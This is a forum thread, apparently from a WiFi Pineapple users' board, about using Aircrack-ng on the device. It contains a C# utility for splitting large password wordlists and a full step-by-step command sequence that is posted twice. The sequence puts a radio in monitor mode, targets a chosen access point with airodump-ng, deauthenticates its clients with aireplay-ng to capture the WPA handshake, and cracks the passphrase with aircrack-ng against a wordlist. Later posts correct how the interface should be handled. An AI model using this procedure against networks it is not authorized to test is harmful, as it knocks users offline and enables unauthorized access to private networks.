reaper_666 Posted November 1, 2014 Share Posted November 1, 2014 Helo, i searched the user infusion for the pineapple on my pineapple but i didn't found aircrack. How can i use aircrack on the pineapple? Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 1, 2014 Share Posted November 1, 2014 (edited) I don't see how to post attachments, so I cannot post my word doc with pictures on this website. The Aircrack-ng documentation will have to suffice. http://www.aircrack-ng.org/doku.php?id=cracking_wpa You will need a wordlist which you will have to get elsewhere. I think I got mine here: http://www.renderlab.net/projects/WPA-tables/ There is also a bug in Aircrack-ng 1.1 (on pineapple) suite that does not allow for wordlists larger than 2 GB, so you will need to break up the wordlists into about 1900MB chunks. I wrote a C# program to do that, but If you use the C# program you will have to use special software to be able to access linux file systems on Windows. If somebody could write in C? /*Author: overwraith*/ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.IO; namespace SplitFile { class Program { static void Main(string[] args) { //-f "E:\Super-WPA" -s "1900M" -d "E:\Wordlists" String usage = "SplitFile.exe -f <fileToSplit> -s <size(G/M/K/B)> -d destination"; String fname = null; long byteSize = 0; String destination = ""; {//set up command line arguments if(args.Length == 0){ Console.WriteLine(usage); Environment.Exit(0); } for (int i = 0; i < args.Length; i++) { if (args[i] == "-f") {//file fname = args[i + 1]; } else if (args[i] == "-s") {//size String str = args[i + 1]; if (str.EndsWith("G")) {//Gigabytes long.TryParse(str.TrimEnd('G'), out byteSize); byteSize *= 1024 * 1024 * 1024; } else if (str.EndsWith("M")) {//Megabytes long.TryParse(str.TrimEnd('M'), out byteSize); byteSize *= 1024 * 1024; } else if (str.EndsWith("K")) {//Kilobytes long.TryParse(str.TrimEnd('M'), out byteSize); byteSize *= 1024; } else {//bytes if (str.EndsWith("B")) long.TryParse(str.TrimEnd('B'), out byteSize); else long.TryParse(str, out byteSize); } } else if (args[i] == "-d")//destination destination = args[i + 1]; }//end loop } Console.WriteLine("\t\t***Partitioning file***"); Console.WriteLine("Target File: " + fname); Console.WriteLine("Partition Sizes: " + byteSize); Console.WriteLine("Destination: " + destination + "\n"); {//write the new partitions StreamReader reader = new StreamReader( new BufferedStream(new FileStream(fname, FileMode.Open, FileAccess.Read))); String password = null; long counter = 0; int i = 1; while (true) { String partition = destination + "\\" + Path.GetFileName(fname) + i.ToString("D2"); StreamWriter writer = new StreamWriter(new BufferedStream(new FileStream(partition, FileMode.Create, FileAccess.Write))); Console.WriteLine("Writing new file: " + partition); //set newline to only "\n", not "\n\r" writer.NewLine = "\n"; //write the password caught in-between streams if (password != null) { counter += password.Length; writer.WriteLine(password); } while (( password = reader.ReadLine() ) != null) { //ASCII chars are 1 byte //if combined value is greater than limit, then break and get a new stream if (counter + password.Length + 1 >= byteSize) { //close file writer.Close(); //reset counter counter = 0; break; } //accumulate the length counter += password.Length + 1; //write the password writer.WriteLine(password); }//end loop if (password == null) break; i++; }//end loop } }//end main }//end class }//end namespace The software I used to access Linux file systems on Windows is: http://www.ext2fsd.com/ You should actually move the actual cracking operation onto a desktop computer, because the pineapple is a little lacking in processing power. Also, I do not have the benefit of having enough hardware for a Linux box at the moment, but you should plan on making a Linux laptop, or something. Probably Kali Linux. Others might have a better procedure in mind. Edited November 1, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
reaper_666 Posted November 1, 2014 Author Share Posted November 1, 2014 Thank you overwraith but how to install aircrack on the pineapple? Or is it pre-installed? Using it with ssl? The way to use aircrack i know ;) Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 1, 2014 Share Posted November 1, 2014 (edited) Aircrack-ng 1.1 already installed on the pineapple, is just an old version. Note that AP stands for access point, and MAC is the media access control address, and when I say <something> I want you to fill in something without the <> symbols. #Turn on injection radio ifconfig wlan1 up #Use this to check ifconfig #turn off airmon if is already on airmon-ng stop wlan1 #turn on airmon, provide it with wlan1 airmon-ng start wlan1 #scan APs in the area #note the channel of the AP you want to attack, and MAC address iwlist wlan0 scan #turn on airodump airodump-ng -c <channel no> --bssid <MAC address> -w <dump file without extension> wlan1 ... #A nifty screen appears, if no stations present, pack up and try again tomorrow, need populated APs to collect handshake #open another terminal connection to the pineapple, and start deauthing some of the clients you noted in the airodump screen #Do this to about 3 clients if you can, the 100 count will keep deauthing them for a while, only deauth as much as you need #I found that I had to deauth more because my AP and the clients ignore a number of deauths. aireplay-ng -0 100 -a <AP MAC> -c <Client MAC> #back on the airodump screen there should be a WPA handshake hash that appears on top right hand side of the screen #kill the program after you get the handshake, it has done it's job #finally the cracking process begins aircrack-ng -w <wordlist> -b <MAC address AP> <capfile.cap> #a screen with current passphrase, and master key, transient key, and Eapol Hmac should appear, will test until finds the right phrase I have a Windows machine, is so bad, I putty in, you will probably use ssh or something. Edited November 1, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted November 1, 2014 Share Posted November 1, 2014 Aircrack-ng 1.1 already installed on the pineapple, is just an old version. Note that AP stands for access point, and MAC is the media access control address, and when I say <something> I want you to fill in something without the <> symbols. #Turn on injection radio ifconfig wlan1 up #Use this to check ifconfig #turn off airmon if is already on airmon-ng stop wlan1 #turn on airmon, provide it with wlan1 airmon-ng start wlan1 #scan APs in the area #note the channel of the AP you want to attack, and MAC address iwlist wlan0 scan #turn on airodump airodump-ng -c <channel no> --bssid <MAC address> -w <dump file without extension> wlan1 ... #A nifty screen appears, if no stations present, pack up and try again tomorrow, need populated APs to collect handshake #open another terminal connection to the pineapple, and start deauthing some of the clients you noted in the airodump screen #Do this to about 3 clients if you can, the 100 count will keep deauthing them for a while, only deauth as much as you need #I found that I had to deauth more because my AP and the clients ignore a number of deauths. aireplay-ng -0 100 -a <AP MAC> -c <Client MAC> #back on the airodump screen there should be a WPA handshake hash that appears on top right hand side of the screen #kill the program after you get the handshake, it has done it's job #finally the cracking process begins aircrack-ng -w <wordlist> -b <MAC address AP> <capfile.cap> #a screen with current passphrase, and master key, transient key, and Eapol Hmac should appear, will test until finds the right phraseI have a Windows machine, is so bad, I putty in, you will probably use ssh or something.Make sure wlan1 is down, otherwise you cannot channel hop. Best regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 1, 2014 Share Posted November 1, 2014 (edited) Make sure wlan1 is down, otherwise you cannot channel hop. Best regards, Sebkinne I don't understand, this worked when I did it to my own network.Wouldn't that make it so that it couldn't inject or receive traffic? Edited November 1, 2014 by overwraith Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted November 1, 2014 Share Posted November 1, 2014 I don't understand, this worked when I did it to my own network.Wouldn't that make it so that it couldn't inject or receive traffic? No, as long as wlan1 is up, you'll see the channel as -1. Best regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 1, 2014 Share Posted November 1, 2014 So we should put the scanning procedure before we activate wlan1? Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted November 1, 2014 Share Posted November 1, 2014 So we should put the scanning procedure before we activate wlan1? No. Put wlan1 down instead of up, airmon it, never bring wlan1 up and use mon0 as the interface. Quote Link to comment Share on other sites More sharing options...
reaper_666 Posted November 2, 2014 Author Share Posted November 2, 2014 Oh nice! Thank you for explaining. Is it possible to update Aircrack? Quote Link to comment Share on other sites More sharing options...
overwraith Posted November 2, 2014 Share Posted November 2, 2014 Oh nice! Thank you for explaining. Is it possible to update Aircrack? I would also like to know this. Quote Link to comment Share on other sites More sharing options...
DataHead Posted November 2, 2014 Share Posted November 2, 2014 (edited) in the openwrt /kamikaze/8.09.2/ar71xx/packages/ , there is aircrack-ng_r1396-1.2_mips.ipk seeing it is an older build of openwrt, but for our ar71xx attitude adjustment build, would this still install? as of current, our version on the pineapple is 1.1 Edited November 2, 2014 by datahead Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.